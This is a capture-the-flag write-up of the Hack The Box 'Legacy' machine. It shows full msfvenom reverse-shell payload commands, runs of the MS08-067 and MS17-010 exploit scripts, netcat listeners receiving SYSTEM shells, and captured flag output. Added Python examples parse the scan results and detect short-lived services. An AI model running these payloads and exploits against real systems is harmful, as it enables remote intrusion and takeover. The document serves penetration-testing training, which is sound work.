[Hack The Box] Legacy – writeup

💀 OS: Windows 💀 Difficulty: Easy 💀 Vulnerability: Remote Code Execution

Scanning and Enumeration:

nmap:

nmap -sC -sV -O 10.10.10.4
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-18 06:30 EDT
Nmap scan report for 10.10.10.4
Host is up (0.23s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open Windows XP microsoft-ds

Three ports are open:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open Windows XP microsoft-ds

445 port:

smbmap -H 10.10.10.4
smbclient -N -L //10.10.10.4
session setup failed: NT_STATUS_INVALID_PARAMETER

Vuln

nmap -v -script smb-vuln* -p 135,139,445 10.10.10.4
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx

Two vulnerabilities were found:
✎ms08-067
✎ms17-010
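
For triaging scan results like the ones above, the following added example (not part of the original writeup) parses smb-vuln-* host-script output into a per-script state with CVE IDs. SAMPLE is the page's own output with the description and reference lines trimmed; the function names parse_smb_vuln and triage are assumptions made for this example.

```python
import re

# Host-script lines copied from the scan output above; description and
# reference lines are left out because the parser skips them anyway.
SAMPLE = """\
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Disclosure date: 2017-03-14
| smb-vuln-ms08-067:
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| Disclosure date: 2008-10-23
"""

SCRIPT = re.compile(r"^\|_?\s*(smb-vuln-[\w-]+):\s*(.*)$")
FIELD = re.compile(r"^\|_?\s*(State|IDs|Disclosure date):\s*(.+)$")


def parse_smb_vuln(text):
    """Map each smb-vuln-* script to its state, CVE IDs and disclosure date."""
    results, current = {}, None
    for line in text.splitlines():
        if m := SCRIPT.match(line):
            inline = m.group(2).strip()
            # "false" is a clean negative; ERROR means the check never ran.
            state = {"false": "NOT VULNERABLE"}.get(
                inline, "ERROR" if inline.startswith("ERROR") else "UNKNOWN")
            current = results[m.group(1)] = {"state": state, "cves": [], "disclosed": None}
        elif (m := FIELD.match(line)) and current is not None:
            key, value = m.group(1), m.group(2).strip()
            if key == "State":
                current["state"] = value
            elif key == "IDs":
                current["cves"] = re.findall(r"CVE-\d{4}-\d+", value)
            else:
                current["disclosed"] = value
    return results


def triage(results):
    """Return (confirmed vulnerable scripts, scripts whose check must be re-run)."""
    confirmed = sorted(n for n, r in results.items()
                       if "VULNERABLE" in r["state"] and not r["state"].startswith("NOT"))
    rerun = sorted(n for n, r in results.items() if r["state"] in ("ERROR", "UNKNOWN"))
    return confirmed, rerun
```

The smb-vuln-ms10-061 line lands in the re-run list rather than being counted as clean, since a script error says nothing about whether the host is patched.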

Exploit:

MS08-067:

Using ms08-067.py, shared by jivoi on GitHub.

Shellcode Generation:

┌──(root㉿kali)-[~]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.11 LPORT=7788 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows
Found 12 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with A valid opcode permutation could not be found.
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=3, char=0x00)
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor succeeded with size 348 (iteration=0)
x86/call4_dword_xor chosen with final size 348
Payload size: 348 bytes
Final size of py file: 1953 bytes

Guess the target machine's version:
Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445
Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)
Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal
Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English
Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)
Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)
Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)

Run Exploit:

┌──(root㉿kali)-[~/Desktop/HTB/Legacy/MS08-067]
└─# python2 MS08-067.py 10.10.10.4 6 445
#######################################################################
# MS08-067 Exploit
# This is a modified verion of Debasis Mohanty's code (https://www.exploit-db.com/exploits/7132/).
# The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi
#
# Mod in 2018 by Andy Acer
# - Added support for selecting a target port at the command line.
# - Changed library calls to allow for establishing a NetBIOS session for SMB transport
# - Changed shellcode handling to allow for variable length shellcode.
#######################################################################

$ This version requires the Python Impacket library version to 0_9_17 or newer.
$
$ Here's how to upgrade if necessary:
$
$ git clone --branch impacket_0_9_17 --single-branch https://github.com/CoreSecurity/impacket/
$ cd impacket
$ pip install .

#######################################################################

Windows XP SP3 English (NX)

[-]Initiating connection
[-]connected to ncacn_np:10.10.10.4[\pipe\browser]
Exploit finish

Attacker machine:

┌──(root㉿kali)-[~]
└─# nc -lvnp 7788
listening on [any] 7788 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.4] 1039
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

MS17-010:

Using the MS17-010 exploit code shared on GitHub.

Backdoor.exe Generation:

┌──(root㉿kali)-[~/Desktop]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.11 LPORT=4444 EXITFUNC=thread -f exe -a x86 --platform windows -o backdoor.exe

No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: backdoor.exe

Run Exploit:

┌──(root㉿kali)-[~/…/HTB/Legacy/MS17-010/MS17-010]
└─# python2 send_and_execute.py 10.10.10.4 backdoor.exe
Trying to connect to 10.10.10.4:445
Target OS: Windows 5.1
Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x860e93a8
SESSION: 0xe1a6c810
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe16ea760
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe16ea800
overwriting token UserAndGroups
Sending file 83LKBF.exe...
Opening SVCManager on 10.10.10.4.....
Creating service kOWm.....
Starting service kOWm.....
The NETBIOS connection with the remote host timed out.
Removing service kOWm.....
ServiceExec Error on: 10.10.10.4
nca_s_proto_error
Done

Receive the reverse shell:

┌──(root㉿kali)-[~/Desktop/HTB/Legacy/MS08-067]
└─# rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.4] 1040
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
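
The send_and_execute.py output above shows a service (kOWm) being created, started and removed within one run. As an added detection example (not part of the original writeup), the code below flags services that are created and deleted within a short window. It assumes service-control activity has already been collected into (time, host, action, service) records; that record format, the host names and every value except the service name kOWm are constructed for illustration.

```python
from datetime import datetime, timedelta

# Constructed, normalised service-control records: (time, host, action, service).
# Only the service name "kOWm" comes from the exploit output above.
EVENTS = [
    ("2023-08-18T10:41:02", "LEGACY", "create", "kOWm"),
    ("2023-08-18T10:41:03", "LEGACY", "start", "kOWm"),
    ("2023-08-18T10:41:35", "LEGACY", "delete", "kOWm"),
    ("2023-08-18T09:00:00", "LEGACY", "create", "BackupAgent"),
    ("2023-08-18T09:00:05", "LEGACY", "start", "BackupAgent"),
    ("2023-08-18T11:00:00", "FILESRV", "create", "TmpUpd"),
    ("2023-08-18T13:30:00", "FILESRV", "delete", "TmpUpd"),
]


def short_lived_services(events, max_lifetime=timedelta(minutes=5)):
    """Return (host, service, lifetime_seconds) for create/delete pairs
    on the same host that are no further apart than max_lifetime."""
    created, hits = {}, []
    # ISO-8601 timestamps sort chronologically as plain strings.
    for ts, host, action, name in sorted(events):
        when = datetime.fromisoformat(ts)
        key = (host, name)
        if action == "create":
            created[key] = when
        elif action == "delete" and key in created:
            lifetime = when - created.pop(key)
            if lifetime <= max_lifetime:
                hits.append((host, name, int(lifetime.total_seconds())))
    return hits


if __name__ == "__main__":
    for hit in short_lived_services(EVENTS):
        print("short-lived service:", hit)
```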

Get FLAG:

C:\Documents and Settings\john\Desktop>type user.txt
e69af0e4...

C:\Documents and Settings\Administrator\Desktop>type root.txt
993442d2...

Follow-up:

The whoami command is not available on Windows XP.
We can share a file to the target over SMB instead.

Attacker machine:

┌──(root㉿kali)-[~/…/HTB/Legacy/MS17-010/MS17-010]
└─# python /usr/share/doc/python3-impacket/examples/smbserver.py a /usr/share/windows-binaries/

Impacket v0.12.0.dev1+20230803.144057.e2092339 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Target machine:

C:\WINDOWS\system32>\\10.10.14.11\a\whoami.exe   
\\10.10.14.11\a\whoami.exe
NT AUTHORITY\SYSTEM
